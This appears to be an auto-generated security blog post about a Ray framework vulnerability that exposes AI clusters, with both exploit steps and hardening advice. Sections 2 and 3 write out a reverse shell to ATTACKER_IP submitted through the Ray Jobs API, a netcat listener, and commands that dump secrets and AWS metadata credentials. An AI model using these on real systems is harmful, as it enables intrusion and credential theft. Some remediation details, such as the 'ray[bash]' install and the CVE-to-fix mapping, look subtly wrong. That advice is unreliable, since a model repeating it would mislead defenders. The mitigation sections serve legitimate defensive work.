Over 100,000 AI Clusters at Risk: Critical Ray Vulnerability Exposes Training Data and Compute + Video

Listen to this Post

Featured Image

Introduction:

A recently uncovered vulnerability in the Ray AI framework, tracked as CVE-2023-6019, has placed over 100,000 AI clusters worldwide at risk of complete compromise. Ray, an open-source unified compute framework, is widely used by major tech companies and research institutions to scale AI and Python workloads. The flaw allows attackers to execute arbitrary code, exfiltrate sensitive training data, and hijack computational resources, posing a significant supply chain risk to the AI development ecosystem.

Learning Objectives:

  • Understand the architecture of the Ray framework and the attack surface exposed by CVE-2023-6019.
  • Learn how to identify vulnerable Ray instances using network scanning tools.
  • Master the step-by-step process of exploiting the vulnerability for authorized penetration testing.
  • Implement robust mitigation strategies and cloud-hardening techniques to secure AI clusters.
  • Apply Linux and Kubernetes security best practices to prevent similar remote code execution flaws.

You Should Know:

  1. Anatomy of the Ray Vulnerability and Initial Reconnaissance
    The Ray framework operates with a head node and multiple worker nodes. The vulnerability resides in the Ray Dashboard component, which by default listens on port 8265 without proper authentication. Attackers can exploit this to submit arbitrary jobs, effectively gaining remote code execution.

To identify exposed Ray clusters in your environment, use the following Nmap command:

nmap -p 8265,6379,10001 --open -sV -sC -oG ray_scan.txt <target_network/CIDR>

This scans for common Ray ports (Dashboard: 8265, Redis: 6379, GCS Server: 10001) and performs version detection.

Once a live Ray instance is identified, you can access the dashboard via a browser:

http://<target_ip>:8265

If the instance is vulnerable, you will see the Ray UI without any login prompt.

2. Exploiting the Flaw: Gaining Remote Code Execution

To demonstrate the exploit for security testing, you can interact with the Ray Jobs API directly using curl. The following command submits a new job that executes a reverse shell on the head node.

First, craft a Python script to be submitted (save as exploit.py):

import os
os.system('bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1')

Then, use the Ray Jobs API to submit the job:

curl -X POST http://<target_ip>:8265/api/jobs/ \
-H "Content-Type: application/json" \
-d '{
"entrypoint": "python exploit.py",
"runtime_env": {
"working_dir": "."
}
}'

On your attacker machine, set up a netcat listener:

nc -lvnp 4444

A successful execution will grant you a shell on the Ray head node, providing access to environment variables, model weights, and potentially cloud metadata credentials.

3. Post-Exploitation: Extracting Secrets and Model Data

Once inside the cluster, attackers typically target environment variables containing API keys and cloud service accounts. Use the following commands to enumerate sensitive information:

 Dump environment variables
env | grep -E "KEY|SECRET|TOKEN|PASS"

Access cloud metadata (AWS IMDS)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

Search for common AI/ML artifacts
find / -name ".pth" -o -name ".h5" -o -name ".joblib" 2>/dev/null

Ray worker nodes often mount shared storage. Check for mounted volumes using `df -h` and lsblk. This is where training datasets and model checkpoints are frequently stored.

4. Mitigation: Securing Ray on Linux Servers

Immediate patching involves upgrading Ray to version 2.6.3 or later. For Ubuntu/Debian-based systems:

pip install -U ray[bash]
sudo systemctl restart ray

If upgrading immediately is not possible, implement strict network filtering using iptables:

 Allow only internal subnet access to Ray ports
sudo iptables -A INPUT -p tcp --dport 8265 -s 10.0.0.0/8 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 8265 -j DROP

Additionally, bind the Ray dashboard to localhost only in the configuration:

ray start --head --dashboard-host 127.0.0.1

5. Hardening Ray Deployments on Kubernetes

In Kubernetes environments, Ray is often deployed via the Ray Operator. To secure the cluster, define a NetworkPolicy that restricts ingress traffic to the Ray head service.

Save the following as `ray-network-policy.yaml`:

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: ray-dashboard-allow-internal
spec:
podSelector:
matchLabels:
ray.io/node-type: head
policyTypes:
- Ingress
ingress:
- from:
- podSelector:
matchLabels:
app: authorized-client
ports:
- protocol: TCP
port: 8265

Apply the policy:

kubectl apply -f ray-network-policy.yaml

Also, ensure that your Ray cluster uses TLS encryption and authentication by setting environment variables like `RAY_COOKIE` and RAY_USE_TLS.

6. API Security and Monitoring

To proactively detect exploitation attempts, monitor Ray API logs for anomalous job submissions. Ray logs are typically stored in /tmp/ray/session_latest/logs/. Use `tail` and `grep` to watch for suspicious entries:

tail -f /tmp/ray/session_latest/logs/dashboard.log | grep -E "POST /api/jobs|job_submit"

Integrate these logs with a SIEM solution. The following auditd rule can also log access to Ray ports:

auditctl -a always,exit -F arch=b64 -S bind -F auid>=1000 -F auid!=4294967295 -k ray-access

What Undercode Say:

  • Key Takeaway 1: The Ray vulnerability underscores a critical blind spot in AI/ML infrastructure security. Default configurations in popular compute frameworks cannot be trusted and must be hardened before deployment to production, especially when handling sensitive data.
  • Key Takeaway 2: Supply chain attacks on AI frameworks are escalating. The ability to execute arbitrary code on Ray clusters not only exposes proprietary models but also provides a pivot point into the broader cloud environment, making it a high-value target for APT groups and cybercriminals.

This incident highlights that the rapid adoption of AI technologies has outpaced the implementation of basic security hygiene. Organizations must integrate security reviews into their MLOps pipelines, treat AI clusters as critical infrastructure, and enforce the principle of least privilege at the network and application levels. The complexity of distributed systems like Ray requires specialized knowledge to secure, and reliance on open-source components necessitates continuous vulnerability monitoring and rapid patch management.

Prediction:

Following this disclosure, we will see a surge in targeted attacks against AI development environments, particularly those hosted in misconfigured cloud instances. This will accelerate the development of AI Security Posture Management (AI-SPM) tools and drive the adoption of “AI Red Teaming” as a standard practice. Future exploits will likely chain this vulnerability with others in the Python supply chain (e.g., malicious PyPI packages) to achieve fully automated, large-scale compromise of AI training pipelines, leading to the first major AI data breach involving stolen foundational models.

▶️ Related Video (80% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Drmarthaboeckenfeld Surgical – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky